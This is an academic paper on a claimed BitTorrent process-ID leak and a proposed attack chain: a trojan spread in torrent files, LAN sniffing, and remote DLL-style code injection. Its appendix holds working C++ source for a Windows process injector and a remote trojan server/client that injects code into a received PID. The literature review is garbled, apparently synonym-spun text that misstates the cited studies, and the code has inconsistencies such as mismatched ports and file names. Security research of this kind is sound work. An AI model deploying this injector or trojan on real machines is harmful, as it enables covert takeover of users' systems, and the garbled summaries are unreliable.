ArticlePDF Available

Abstract and Figures

BitTorrent is the most extensively used protocol in peer-to-peer systems. Its clients are widely spread worldwide and account for a large fraction of today’s Internet traffic. This paper will discuss potential attack that exploits a certain vulnerability of BitTorrent based systems. Code injection refers to force a code – which may be malicious - to run inside another benign code, by inserting it into known process name or process ID. Operating systems supply API functions that can be used by third party to inject a few lines of malicious code inside the original running process, which can effectively damage or harm user resources. Ethernet is the most common internetwork layer for Local Area Networks; the shared medium of LAN enables all users on the same broadcasting domain to listen to all exchanged packets through the network (promiscuous mode), so any adversary can easily perform a simple packet sniffing process on the medium access layer of the network. By capturing and analyzing the sent packets from the P2P application, an adversary can use the revealed process ID by BitTorrent protocol to start the code injection action. So the adversary will be able to seize more machines from the network. Controlled machines can be used to perform many attacks. The study revealed that any adversary can exploit the vulnerability of the process communication model used in P2P by injecting any malicious process inside the BitTorrent application itself exposed by sniffing the exchanged BitTorrent packets through LAN.
Content may be subject to copyright.
(IJACSA) International Journal of Advanced Computer Science and Applications,
Vol. 6, No. 4, 2015
85 | P a g e
www.ijacsa.thesai.org
Vulnerability of the Process Communication Model in
Bittorrent Protocol
A study of BitTorrent protocol trap door and potential attacks on peer-to-peer users
Ahmed ElShafee
Assistant Professor, Faculty of Engineering
Ahram Canadian University
6th October, Egypt
Abstract BitTorrent is the most extensively used protocol in
peer-to-peer systems. Its clients are widely spread worldwide and
account for a large fraction of today’s Internet traffic. This paper
will discuss potential attack that exploits a certain vulnerability
of BitTorrent based systems. Code injection refers to force a code
which may be malicious - to run inside another benign code, by
inserting it into known process name or process ID. Operating
systems supply API functions that can be used by third party to
inject a few lines of malicious code inside the original running
process, which can effectively damage or harm user resources.
Ethernet is the most common internetwork layer for Local Area
Networks; the shared medium of LAN enables all users on the
same broadcasting domain to listen to all exchanged packets
through the network (promiscuous mode), so any adversary can
easily perform a simple packet sniffing process on the medium
access layer of the network. By capturing and analyzing the sent
packets from the P2P application, an adversary can use the
revealed process ID by BitTorrent protocol to start the code
injection action. So the adversary will be able to seize more
machines from the network. Controlled machines can be used to
perform many attacks. The study revealed that any adversary
can exploit the vulnerability of the process communication model
used in P2P by injecting any malicious process inside the
BitTorrent application itself exposed by sniffing the exchanged
BitTorrent packets through LAN.
KeywordsPeer-to-Peer security; BitTorrent protocol; Code
injection; Packets sniffing, Ethernet LAN
I. INTRODUCTION
P2P or "Peer-to-Peer" is a network of host computers that
operate and communicate with each other without the need for
a centralized serverthe opposite of a client-server network
model. A peer-to-peer file sharing system is a network of
interconnected computers using P2P networking model to
share and exchange data (digital documents) between
connected computers. Peer-to-peer file sharing technology
allows people worldwide to share and exchange their files and
data as long as their PCs are connected to the Internet. P2P file
sharing system users can easily exchange and access other
users’ media files like books, music, movies, games, software,
etc. by using special P2P software program installed on both
sender and receiver PCs [1]. Copyright issues have popped up
by rights holders as peer-to-peer networks can be used to share
copyrighted data without getting permissions from data
copyright holders or considering its legitimate usage.
The FBI is teaching and cautioning users about specific
dangers of using Peer-to-Peer frameworks while connecting to
the Internet. While the FBI backs and empowers the
advancement and development of new technologies and
techniques, they additionally perceive that innovation can be
abused for illegal and, sometimes, criminal purposes [2].
Peer-to-Peer systems permit clients joined with the Internet
to connect their machines with other machines as far and wide
as possible. These systems are secured with the end goal of
sharing files. Normally, clients of Peer-to-Peer systems use free
software tools on their machines which permits them: (1) to
discover and download files found on an alternate Peer-to-Peer
client's hard drive, and (2) to impart to those other client’s files
located on the user’s machine. Undesirably in some cases these
data-sharing frameworks have been utilized to participate in
illegal activities.
Code injection refers to a process of injecting or inserting a
code into a known running process. The injected code always
came in the form of dynamic link library (DLL), as that meets
the nature of DLL: Dynamically load a code as needed. The
code injector should have an appropriate level of authority on
the system under attack, in order to be able to write into
program memory [3].
Windows operating system provides a few API functions
that allow users to debug running programs, and to insert
functions into any running process, makes the targeted program
execute the injected code as if is a part of its original code [4].
Ethernet is the most popular internetwork for wired Local
Area Network (LAN). Ethernet is completely insecure;
developers and vendors may implements their own non-
standard solutions to overcome Ethernet weakness, but as a
standard, Ethernet is an open medium access, as every client
connected to the same logical broadcasting domain can easily
listen to Ethernet frames travelling through the physical
medium [5].
Network sniffing refers to capturing packets/frames being
transferred over a network using sniffer software. There are
many sniffers commercially available or offered by researchers
and security groups as open source software. Sniffers may
come with their own network drivers that enable the network
interface card to capture frames which are directed to other
receptors. Modern sniffers offer capabilities to analyze
(IJACSA) International Journal of Advanced Computer Science and Applications,
Vol. 6, No. 4, 2015
86 | P a g e
www.ijacsa.thesai.org
captured packets in order to extract useful information in a user
friendly format [6].
II. LITERATURE REVIEW
Substantial research was found related to the examination
of P2P networks and their applications.
Scanlon, Mark, and M. Kechadi. [7], presented the
Universal Peer-to-Peer Network Investigation Framework
(UP2PNIF), a structure which empowers essentially quicker
and less work escalated examination of newfound P2P
organizes through the misuse of the shared qualities in system
usefulness. In mix with a reference database of known system
conventions and attributes, it is imagined that any known P2P
system can be right away explored using the framework. The
skeleton can cleverly emphasize the best procedure subject to
the center of the examination bringing about an altogether
assisted proof get-together process.
Acorn Jamie; in his research entitled "Crime scene
investigation of BitTorrent", [8] recognized scientific relics
delivered by BitTorrent file offering, and particularly, to create
if the remaining could prompt the IDs of the records
downloaded or the files shared. The dissection showed that it
was conceivable to distinguish files that were at present being
downloaded and records presently being shared. It was
additionally conceivable to recognize the measure of
information that had been traded i.e. transferred or downloaded
for particular files. Some users delivered relics that uncovered
a complete record of the torrent documents that had been
downloaded and shared. Dissection likewise uncovered that
some users kept the Internet Protocol (IP) locations of remote
machines, with which they had associated when downloading
or sharing particular files. The point of interest and legal nature
of data distinguished differed between the users’ clients tested.
Liberatore, Marc, et al. in their paper entitled ―Forensic
investigation of peer-to-peer file sharing networks" [9] detailed
the usefulness of two P2P conventions, Gnutella and
BitTorrent, and portrayed the legitimate issues relating to
exploring such systems. The author investigated the
conventions and concentrated on the things specifically
noteworthy to agents, for example, the estimation of proof
provided for its provenance on the system. They additionally
reported development of RoundUp, a gadget for Gnutella
examinations that takes after the standards and systems the
author detail for systems administration examinations.
Park, Sooyoung, et al. in their research entitled
―Methodology and implementation for tracking the file sharers
use BitTorrent" [1], proposed a philosophy for the examination
of unlawful file sharers utilizing BitTorrent systems through
the utilization of a P2P computerized examination process. In
this paper, an examination process for illegitimate file sharing
focused around attributes of file that BitTorrent has
recommended for the sharing procedure utilizing. By
emulating this process, an agent can successfully lead an
examination about unlawful document imparting.
CybersTc developed P2P Marshal™ [10] as an advanced
scientific tool for the programmed recognition, extraction and
dissection of information connected with peer-to-peer
applications on a hard drive. It computerizes the monotonous
and tedious methodology of searching for P2P proof. P2P
Marshal naturally locates a program of the most ordinarily
utilized P2P customer projects and presents for every client
data on those customers, including imparted documents,
downloaded records, peer servers, and arrangement and log
data. P2P Marshal performs these assignments in a forensically
legitimate manner and presents the results in an effortlessly
intelligible structure on-screen and in a configuration that can
without much of a stretch be joined into a report. P2P Marshal
takes after scientific best practices and keeps up a detailed log
record of all exercises it performs. It has broad hunt capacities,
produces reports in CSV, RTF, PDF and HTML organizations,
and runs on normal Windows stages. P2P Marshal is accessible
in a in a software-only version called Forensic Edition, and in a
USB 2.0 flash drive version called Field Edition.
Farina, Jason, Mark Scanlon, and M. Kechadi in their
research entitled ―BitTorrent Sync: First Impressions and
Digital Forensic Implications" [11] considered BitTorrent Sync
as an optional P2P application. Its administration is totally
decentralized, offers a great part of the same synchronization
usefulness of cloud powered administrations and uses
encryption for information transmission (and alternatively for
remote storage). The vitality of comprehension Bit-Torrent
Sync and its ensuing advanced investigative consequences for
law requirement a scientific specialist will be foremost to
future examinations. This paper plots the customer application,
its recognized system activity and distinguishes artifacts that
may be of worth as confirmation for future advanced
examinations.
Lallie, Harjinder Singh, and Philip James Briggs, in their
research entitled "Windows 7 registry forensic evidence
created by three popular BitTorrent clients‖ [12] presented the
concept of web file sharing through the utilization of peer-to-
peer systems movement that has been developing consistently
for a few years. It has quickly turned into the broadest
technique for the trade of computerized material and
accordingly raises much debate. The present, most prevalent
convention in this field is BitTorrent. Despite the fact that it is
generally basic as a rule to connection specific file sharing
exercises to an IP address, this does little to demonstrate that a
specific client was in charge of utilizing the connection. This
study investigates three prominent BitTorrent customer
applications: Bitcomet, Vuze and Utorrent, and outlines the
registry artifacts that are produced by the establishment and
utilization of these projects on a Windows 7 client. These
artifacts are analyzed in point of interest to build what helpful
evidence, if any, can be recovered from them. Important data is
highlighted for every application.
Liberatore, Marc, Brian Neil Levine, and Clay Shield, in
their research entitled "Strengthening forensic investigations of
child pornography on P2P networks‖ [13] introduced new
methods that draw a fine line between the estimation or
reconnaissance of P2P systems and gathering of forensically
legitimate evidence from their clients. Approving the evidence
gathered within a system examination is troublesome in light of
the fact that remote clients don't keep up a novel and un-
modifiable identifier that can be retrieved upon seizure of their
machine with a warrant. They proposed a novel strategy for
quietly labeling a remote machine over the system to make
(IJACSA) International Journal of Advanced Computer Science and Applications,
Vol. 6, No. 4, 2015
87 | P a g e
www.ijacsa.thesai.org
such an identifier. Their methodology is a development over
past techniques for social event data around a remote machine
that depend on factual characterizations, including clock skew
or radio-measurements. These past characterizations differ with
environmental elements, for example, temperature or assault,
prompting both false positives and false negatives, and
essentially, fail to offer the capacity to connect together
successive perception by autonomous observer. Also, they
detail why their methodology, which is equated to checking
bills, is legitimate. For this work, they introduced a framework
to accumulate evidence of ownership of child erotic
entertainment on a P2P system. It is being used by law
requirement in 49 U.S. states that have assembled information
for the investigators over a five-month period of time. To date,
the framework and its information have been utilized to get in
excess of 1,000 court search warrants. They describe these
estimations with a specific end goal of persuading their tagging
strategies.
III. PROPOSED ATTACK AND RISK ANALYSIS
This section introduces how the BitTorrent’s discovered
vulnerability will be exploited.
A. Problem definition
This study investigated the network activity of BitTorrent
protocol by using packet sniffing technique on a P2P enabled
system based on BitTorrent protocol. The author noticed that
during its startup, the BitTorrent based system, established a
communication session with BitTorrent server and sent the
BitTorrent software process ID identified by the OS. As per the
definition of OS frameworks, it is not really programming
pieces (i.e., programs) that are communicating, yet in fact
processes are responsible for the communication part in OS
frameworks. At this point, an adversary can eavesdrop on all
packets being sent from a targeted client during BitTorrent
software startup process, with assistance of a Trojan being
planted in the targeted host (Trojans can easily spread over a
torrent media file and can be activated during running and
execution of torrent downloaded media). Adversary can
remotely inject a malicious code inside BitTorrent software
itself, and run that malicious code as if it were a part of
BitTorrent software. In the following few subsections, the
attacking scenario is discussed in details.
B. The proposed attacking overall scenario
The proposed attack scenario consists of four tasks as
shown in Fig. 1.
1) Trojan distribution among tergeted hosts:
The distribution process of Trojans can be held very easily
in P2P based systems. The following figure (Fig.2) shows a
group of torrent clients exchanging an infected torrent media
file. The main seeder for that file implants a Trojan in torrent
media/application file that will be resident after extracting and
executing the downloaded media/application file. That Trojan
is the main play maker of our attack scenario. Figure 2 shows
the main tasks of implanted Trojan, which are: infecting
targeted host, running as OS service, listening to a pre-defined
port, waiting for attacker’s calls and requests, and finally
injecting malicious code received from attacker into BitTorrent
software using received process ID. Figure 3 shows the basic
steps of implanting Trojans into targeted hosts.
Fig. 1. Proposed attack overall scenario
2) Packet sniffing
Wireshark is a free network protocol analyzer that runs on
Windows, Linux/Unix, and Mac computers, allowing users to
display the contents of messages undergoing shared network
segment at different levels of the protocol stack.
As attacker is going to sniff packets that are not directed to
the attacker’s machine, Wireshark should be configured to
"promiscuous mode", and, on a switched Ethernet network,
attacker must specifically set up the machine in order to
capture that traffic. Wireshark capturing process is shown in
Fig.4.
After capturing, the attacker starts analyzing the captured
packet by filtering the captured packet by destination IP of
LAN gateway, then searching for TCP packet contain the
―PID=‖ string in its data field, which is the BitTorrent software
process ID number that was sent by BitTorrent software to
BitTorrent server. Fig. 5 shows the steps of that task.
3) Remote malicious code injection
The final step of the attack is explained in Fig. 6
(IJACSA) International Journal of Advanced Computer Science and Applications,
Vol. 6, No. 4, 2015
88 | P a g e
www.ijacsa.thesai.org
IV. PROPOSED ATTACK IMPLEMENTATION
As mentioned in section 3, attack scenario consists of four
tasks. To verify the proposed attack, two software programs
were written in C++ language, on Dev-C++ free IDE.
Fig. 2. Left: a group of torrent clients exchanging an infected torrent media file. Right: the client infected with attacker Trojan
Fig. 3. The basic steps of implanting Trojans into targeted hosts
The first program presents the implanted Trojan, named
―RemoteInjectorServer.cpp‖ which is responsible for listening
to attacker calls, and injecting attacker malicious code inside
BitTorrent software. The second program, named
―RemoteInjectorClient.cpp‖, presents the attacker front end,
and is responsible for sending calls to a Trojan resident in the
attacked host containing the BitTorrent discovered process ID
and malicious injection code. Both programs’ source code and
their libraries are listed in the appendix. Another program was
developed to discover the process ID number on local
machines, namely ―getPID.cpp‖ to verify the PID discovered
by the attacker is the real PID of BitTorrent software.
Two free and open source programs were used in testing
the proposed attack scenario, those are ―Wireshark‖ and
―Process Monitor‖. Wireshark is a packet sniffer and analyzer
software, used by the attacker to capture the packet being sent
to LAN gateway, in order to get the PID sent by BitTorrent
software during its initialization. Process Monitor software
collects all running processes and displays their process IDs on
a local machine. Which was used to verify the discovered PID
by attacker.
V. PROPOSED ATTACK TESTING & VERIFICATION
In this section, the captured images of the complete attack
scenario are shown, presenting step-by-step attacking process.
In this scenario, two virtual machines were built using
VMware software to present attacker and host under attack.
Windows 7 was installed on both machines.
In the host machine under attack, author performed the
following:
Installed uTorrent software (an example of BitTorrent
based software) and a BitTorrent file containing the
media files is in the process of being downloaded.
Installed Process Monitor software to discover PIDs of
running processes.
Installed the developed program ―GetPID.exe‖, which
returns the local PID of uTorrent.exe.
Installed developed program
―RemoteTrojanServer.exe‖, which presents the
implanted Trojan.
Installed WireShark software to capture gateway
packets and analyze them to get PID sent by uTorrent
during its initialization.
(IJACSA) International Journal of Advanced Computer Science and Applications,
Vol. 6, No. 4, 2015
89 | P a g e
www.ijacsa.thesai.org
Installed developed program ―RemoteInjectorServer.exe‖,
which sends PID and injected malicious code.
Fig. 4. Wireshark capturing process
Fig. 5. The basic four steps of packet sniffing task
Fig. 6. The four main steps of remote malicious code injection process
The following figures (Fig. 7 Fig. 11) show the entire
attack process as captured from the practical experiment.
Given that gateway IP was 192.168.52.2‖, host under
attack IP was ―192.168.52.139, Fig.7 shows packets captured
by Wireshark on attacker PC which were filtered by source IP
address ―192.168.52.139‖ to discover the PID ―764‖.
VI. CONCLUSION
BitTorrent based applications are freeware tools that are
basically used to share illegal resources in addition to its legal
utilization. Users of these applications are not aware about the
protocol trapdoor, which is basically leaking the BitTorrent
application process ID during its initialization process. Author
established and proved attacking scenario based on such
leakage. Software programs were developed using Dev-C++ to
simulate implanted Trojan and attacker frontend. Author
encourages BitTorrent based application users to avoid
downloading any executable applications that may be infected
with implanted Trojans which may indirectly damage user
resources through injecting malicious code during run time of
BitTorrent application itself.
REFERENCES
[1] Park, Sooyoung, et al. "Methodology and Implementation for Tracking
the File Sharers use BitTorrent." Multimedia Tools and Applications
(2013): 1-16.
[2] Steinmetz, Ralf, and Klaus Wehrle, eds. Peer-to-peer systems and
applications. Vol. 3485. Springer Science & Business Media, 2005.
[3] Singh, Ajey, and Maneesh Shrivastava. "Overview of attacks on cloud
computing." International Journal of Engineering and Innovative
Technology (IJEIT) 1.4 (2012).
[4] Fewer, Stephen. "Reflective DLL injection." Harmony Security, Version
1 (2008).
[5] Timo Kiravuo, Mikko S¨arel¨a, and Jukka Manner, "Survey of Ethernet
LAN Security", IEEE Communications Surveys & Tutorials, vol. 15, no.
3, third quarter 2013
[6] Orebaugh, Angela, Gilbert Ramirez, and Jay Beale. Wireshark &
Ethereal network protocol analyzer toolkit. Syngress, 2006.
[7] Scanlon, Mark, and M. Kechadi. "Universal Peer-to-Peer Network
Investigation Framework." Availability, Reliability and Security
(ARES), 2013 Eighth International Conference on IEEE, 2013.
[8] Acorn, Jamie. Forensics of BitTorrent. Technical Report RHUL-MA-
2008-04, 2008.
[9] Liberatore, Marc, et al. "Forensic Investigation of Peer-to-Peer File
Sharing Networks." Digital Investigation 7 (2010): S95-S103.
[10] CybersTc P2P Marshal™
(IJACSA) International Journal of Advanced Computer Science and Applications,
Vol. 6, No. 4, 2015
90 | P a g e
www.ijacsa.thesai.org
[11] Farina, Jason, Mark Scanlon, and M. Kechadi. "BitTorrent Sync: First
Impressions and Digital Forensic Implications." Digital Investigation 11
(2014): S77-S86.
[12] Lallie, Harjinder Singh, and Philip James Briggs. "Windows 7 Registry
Forensic Evidence Created by Three Popular BitTorrent Clients." Digital
Investigation 7.3 (2011): 127-134.
[13] Liberatore, Marc, Brian Neil Levine, and Clay Shields. "Strengthening
Forensic Investigations of Child Pornography on P2P Networks."
Proceedings of the 6th International Conference. ACM, 2010.
Fig. 7. Wireshark packets analyzing the discovered PID (= 764) on TCP packet sent by host under attack
(IJACSA) International Journal of Advanced Computer Science and Applications,
Vol. 6, No. 4, 2015
91 | P a g e
www.ijacsa.thesai.org
Fig. 8. Getting process ID of uTorrent using getPID.exe and Process Monitor software
Fig. 9. Left: Attacker front end ―RemoteInjectorClient‖ running on attacking machine; Right: the implanted Trojan ―RemotInjectorServer‖ running on host under
attack
(IJACSA) International Journal of Advanced Computer Science and Applications,
Vol. 6, No. 4, 2015
92 | P a g e
www.ijacsa.thesai.org
Fig. 10. Attacker machine establishing connection to attacked machine (side by side)
Fig. 11. Attacker machine successfully injected malicious message box to attacked machine side by side
APPENDICES
Injector.cpp
#include "injector.h"
DWORD injectedFunc(PARAMETERS * myparams){
MsgBoxParam injectedMsgBox =
(MsgBoxParam)myparams->MessageBoxInj;
int res = injectedMsgBox(0, myparams->text,
myparams->caption, myparams->buttons);
switch(res){
case IDOK:
// more malicious injection
case IDCANCEL:
// more malicious injection
}
return 0;
(IJACSA) International Journal of Advanced Computer Science and Applications,
Vol. 6, No. 4, 2015
93 | P a g e
www.ijacsa.thesai.org
}
DWORD nullFunc(){
return 0;
}
//to avoid conflicts with the system
int preparePrivileges(){
HANDLE h;
TOKEN_PRIVILEGES tp;
if(OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY,&h))
{
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.
Privileges[0].Luid);
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes =
SE_PRIVILEGE_ENABLED;
if (AdjustTokenPrivileges(h, 0, &tp, sizeof(tp),
NULL, NULL)==0){
return 1;
}else{
return 0;
}
}
return 1;
}
int inject(DWORD pid)
{
preparePrivileges();
if (pid==0) return 1; //error
HANDLE p;
p = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
//opening process
if (p==NULL) return 1; //error
char * mytext = "you have just inject this message into
an application.\0";
char * mycaption = "Injection result\0";
PARAMETERS myData;
HMODULE user32 = LoadLibrary("User32.dll");
myData.MessageBoxInj =
(DWORD)GetProcAddress(user32, "MessageBoxA");//
injected message box
strcpy(myData.text, mytext); // message of message
box
strcpy(myData.caption, mycaption); // message box
caption
myData.buttons = MB_OKCANCEL |
MB_ICONQUESTION; // message box buttons
DWORD size_injectedFunc = (PBYTE)nullFunc -
(PBYTE)injectedFunc; //calculate myFunc size
//--------injection starts here
LPVOID injectedFuncAddress = VirtualAllocEx(p,
NULL, size_injectedFunc,
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE); // myFunc memory
WriteProcessMemory(p, injectedFuncAddress,
(void*)injectedFunc,
size_injectedFunc,NULL);
// write injected code into memory
LPVOID DataAddress =
VirtualAllocEx(p,NULL,sizeof(PARAMETERS
),MEM_RESERVE|MEM_COMMIT,PAGE_READWRI
TE); //data memory
WriteProcessMemory(p, DataAddress, &myData,
sizeof(PARAMETERS), NULL); // write data
HANDLE myThread = CreateRemoteThread(p,
NULL, 0,
(LPTHREAD_START_ROUTINE)injectedFuncAddress,
DataAddress, 0, NULL); // create thread
if (myThread!=0){
//injection completed
WaitForSingleObject(myThread, INFINITE); //wait
till thread finishes
VirtualFree(injectedFuncAddress, 0,
MEM_RELEASE); //free up myFunc memory
VirtualFree(DataAddress, 0, MEM_RELEASE);
//free up data memory
CloseHandle(myThread); // kill thread
CloseHandle(p); //close the handle to the process
}
else{//error
}
system("PAUSE");
return EXIT_SUCCESS;
}
Injector.h
//injector.cpp
#pragma once
#include <iostream>
#include <cstdlib>
#include <iostream>
#include <windows.h>
#include <iostream>
#include <fstream>
#include <stdlib.h>
#include <tlhelp32.h>
using namespace std;
typedef int (WINAPI* MsgBoxParam)(HWND,
LPCSTR, LPCSTR, UINT);
struct PARAMETERS{
DWORD MessageBoxInj;
char text[50];
char caption[25];
int buttons;
// HWND handle;
};
int preparePrivileges();
DWORD injectedFunc(PARAMETERS * myparam);
DWORD nullfunc(); // used to get myFunc memory
allocated size
int inject(DWORD pid);
Socket.cpp
(IJACSA) International Journal of Advanced Computer Science and Applications,
Vol. 6, No. 4, 2015
94 | P a g e
www.ijacsa.thesai.org
//socket.cpp
#include "socket.h"
Socket::Socket()
{
if( WSAStartup( MAKEWORD(2, 2), &wsaData ) !=
NO_ERROR )
{
cerr<<"Socket Error.\n"<<endl;
system("pause");
WSACleanup();
exit(10);
}
//Create a socket
mySocket = socket( AF_INET, SOCK_STREAM,
IPPROTO_TCP );
if ( mySocket == INVALID_SOCKET )
{
cerr<<"Socket Error."<<endl;
system("pause");
WSACleanup();
exit(11);
}
myBackup = mySocket;
}
Socket::~Socket()
{
WSACleanup();
}
bool Socket::SendData( char *buff )
{
send( mySocket, buff, strlen( buff ), 0 );
return true;
}
bool Socket::RecvData( char *buff, int len )
{
int i = recv(mySocket,buff,len,0);
buff[i] = '\0';
return true;
}
void Socket::CloseConnection()
{
closesocket( mySocket );
mySocket = myBackup;
}
void Socket::GetAndSendMessage()
{
char msg[BuffLength];
cin.ignore();
cout<<"Send > ";
cin.get( msg, BuffLength );
SendData( msg );
}
void ServerSocket::StartHosting( int port )
{
Bind( port );
Listen();
}
void ServerSocket::Listen()
{
if ( listen ( mySocket, 1 ) == SOCKET_ERROR )
{
cerr<<"ServerSocket Error\n";
system("pause");
WSACleanup();
exit(15);
}
acceptSocket = accept( myBackup, NULL, NULL );
while ( acceptSocket == SOCKET_ERROR )
{
acceptSocket = accept( myBackup, NULL, NULL );
}
mySocket = acceptSocket;
}
void ServerSocket::Bind( int port )
{
char *addr="0.0.0.0";
myAddress.sin_family = AF_INET;
myAddress.sin_addr.s_addr = inet_addr(addr);
myAddress.sin_port = htons( port );
if ( bind ( mySocket, (SOCKADDR*) &myAddress,
sizeof( myAddress) ) == SOCKET_ERROR )
{
cerr<<"Server error"<<endl;
system("pause");
WSACleanup();
exit(14);
}
}
void ClientSocket::ConnectToServer( const char
*ipAddress, int port )
{
myAddress.sin_family = AF_INET;
myAddress.sin_addr.s_addr = inet_addr( ipAddress );
myAddress.sin_port = htons( port );
if ( connect( mySocket, (SOCKADDR*) &myAddress,
sizeof( myAddress ) ) == SOCKET_ERROR )
{
cerr<<"Client error"<<endl;
system("pause");
WSACleanup();
exit(13);
}
}
void Socket::SendAMessage(char message[BuffLength])
{
SendData( message );
}
Socket.h
//Socket.h
#pragma once
#include <iostream>
#include "WinSock2.h"
using namespace std;
(IJACSA) International Journal of Advanced Computer Science and Applications,
Vol. 6, No. 4, 2015
95 | P a g e
www.ijacsa.thesai.org
const int BuffLength = 256;
class Socket
{
protected:
WSADATA wsaData;
SOCKET mySocket;
SOCKET myBackup;
SOCKET acceptSocket;
sockaddr_in myAddress;
public:
Socket();
~Socket();
bool SendData( char* );
bool RecvData( char*, int );
void CloseConnection();
void GetAndSendMessage();
void SendAMessage(char message[BuffLength]);
};
class ServerSocket : public Socket
{
public:
void Listen();
void Bind( int port );
void StartHosting( int port );
};
class ClientSocket : public Socket
{
public:
void ConnectToServer( const char *ipAddress, int
port );
};
RemoteInjector.cpp
//Main.cpp
#include "socket.h"
#include "injector.h"
using namespace std;
int main()
{
int choice;
int port = 888;
bool done = false;
char recMessage[STRLEN];
cout<<"Remote Injector Server started @ 666
port,..."<<endl;
//SERVER
ServerSocket sockServer;
cout<<"HOSTING..."<<endl;
sockServer.StartHosting( port );
//Connected
cout<<"remote Injector Client is
connected,..."<<endl;
while ( !done )
{
sockServer.RecvData( recMessage, STRLEN );
cout<<"Recv PID > "<<recMessage<<endl;
if ( strcmp( recMessage, "end" ) == 0 )
{
done = true;
return 0;
}
inject(atoi(recMessage));
}
}
ClientInjector.cpp
//RemoteInjectorClient//main.cpp
#include "Socket.h"
using namespace std;
int main()
{
int port = 888;
string RemoteIP;
bool end = false;
char msg[BuffLength];
cout<<"Remote Injector client,..."<<endl;
cout<<"Enter Remote Injector server : "<<endl;
cin>>RemoteIP;
//create client socket
ClientSocket CS;
cout<<"Attempting to connect..."<<endl;
CS.ConnectToServer( RemoteIP.c_str(), port );
//Connected
cout<<"Remote Injector client is connected to a
Remote Injector server."<<endl;
while ( !end )
{
cin.ignore();
cout<<"Enter a pid:";
cin.get( msg, BuffLength );
CS.SendAMessage(msg);
if ( strcmp( msg, "end" ) == 0 )
{
end = true;
}
}
CS.CloseConnection();
}
ResearchGate has not been able to resolve any citations for this publication.
Article
Full-text available
With professional and home Internet users becoming increasingly concerned with data protection and privacy, the privacy afforded by popular cloud file synchronisation services, such as Dropbox, OneDrive and Google Drive, is coming under scrutiny in the press. A number of these services have recently been reported as sharing information with governmental security agencies without warrants. BitTorrent Sync is seen as an alternative by many and has gathered over two million users by December 2013 (doubling since the previous month). The service is completely decentralised, offers much of the same synchronisation functionality of cloud powered services and utilises encryption for data transmission (and optionally for remote storage). The importance of understanding BitTorrent Sync and its resulting digital investigative implications for law enforcement and forensic investigators will be paramount to future investigations. This paper outlines the client application, its detected network traffic and identifies artefacts that may be of value as evidence for future digital investigations.
Conference Paper
Full-text available
Peer-to-Peer (P2P) networking has fast become a useful technological advancement for a vast range of cyber criminal activities. Cyber crimes from copyright infringement and spamming, to serious, high financial impact crimes, such as fraud, distributed denial of service attacks (DDoS) and phishing can all be aided by applications and systems based on the technology. The requirement for investigating P2P based systems is not limited to the more well known cyber crimes listed above, as many more legitimate P2P based applications may also be pertinent to a digital forensic investigation, e.g., VoIP and instant messaging communications, etc. Investigating these networks has become increasingly difficult due to the broad range of network topologies and the ever increasing and evolving range of P2P based applications. This paper introduces the Universal Peer-to-Peer Network Investigation Framework (UP2PNIF), a framework which enables significantly faster and less labour intensive investigation of newly discovered P2P networks through the exploitation of the commonalities in network functionality. In combination with a reference database of known network protocols and characteristics, it is envisioned that any known P2P network can be instantly investigated using the framework. The framework can intelligently determine the best methodology dependant on the focus of the investigation resulting in a significantly expedited evidence gathering process.
Article
Full-text available
Ethernet is the survivor of the LAN wars. It is hard to find an IP packet that has not passed over an Ethernet segment. One important reason for this is Ethernet's simplicity and ease of configuration. However, Ethernet has always been known to be an insecure technology. Recent successful malware attacks and the move towards cloud computing in data centers demand that attention be paid to the security aspects of Ethernet. In this paper, we present known Ethernet related threats and discuss existing solutions from business, hacker, and academic communities. Major issues, like insecurities related to Address Resolution Protocol and to self-configurability, are discussed. The solutions fall roughly into three categories: accepting Ethernet's insecurity and circling it with firewalls; creating a logical separation between the switches and end hosts; and centralized cryptography based schemes. However, none of the above provides the perfect combination of simplicity and security befitting Ethernet.
Article
Full-text available
Sharing copyright protected content without the copyright holder’s permission is illegal in many countries. Regardless, the number of illegal file sharing using BitTorrent continues to grow and most of file sharers and downloader are unconcerned legal action to transfer copywrite-protected files. However, it is difficult to gather enough probative evidence to prosecute illegal file sharers in criminal court and/or sued for damages in civil court. Further, there is a lack of research on investigation techniques to reveal illegal BitTorrent sharers. This is because the role of the server in BitTorrent networks has been changed compared to servers in conventional P2P networks. As a result, it is difficult to apply previous investigation processes for investigation of conventional P2P networks to the investigation of suspected illegal file sharing using BitTorrent. This paper proposes a methodology for the investigation of illegal file sharers using BitTorrent networks through the use of a P2P digital investigation process.
Article
Full-text available
The investigation of peer-to-peer (p2p) file sharing networks is now of critical interest to law enforcement. P2P networks are extensively used for sharing and distribution of contraband. We detail the functionality of two p2p protocols, Gnutella and BitTorrent, and describe the legal issues pertaining to investigating such networks. We present an analysis of the protocols focused on the items of particular interest to investigators, such as the value of evidence given its provenance on the network. We also report our development of RoundUp, a tool for Gnutella investigations that follows the principles and techniques we detail for networking investigations. RoundUp has experienced rapid acceptance and deployment: it is currently used by 52 Internet Crimes Against Children (ICAC) Task Forces, who each share data from investigations in a central database. Using RoundUp, since October 2009, over 300,000 unique installations of Gnutella have been observed by law enforcement sharing known contraband in the the U.S. Using leads and evidence from RoundUp, a total of 558 search warrants have been issued and executed during that time.
Conference Paper
Full-text available
Measurements of the Internet for law enforcement purposes must be forensically valid. We examine the problems inherent in using various network- and application-level identifiers in the context of forensic measurement, as exemplified in the policing of peer-to-peer file sharing networks for sexually exploitative imagery of children (child pornography). First, we present a five-month measurement performed in the law enforcement context. We then show how the identifiers in these measurements can be unreliable, and propose the tagging of remote machines. Our proposed tagging method marks remote machines by providing them with application- or system-level data which is valid, but which covertly has meaning to investigators. This tagging allows investigators to link network observations with physical evidence in a legal, forensically strong, and valid manner. We present a detailed model and analysis of our method, show how tagging can be used in several specific applications, discuss the general applicability of our method, and detail why the tags are strong evidence of criminal intent and participation in a crime.
Book
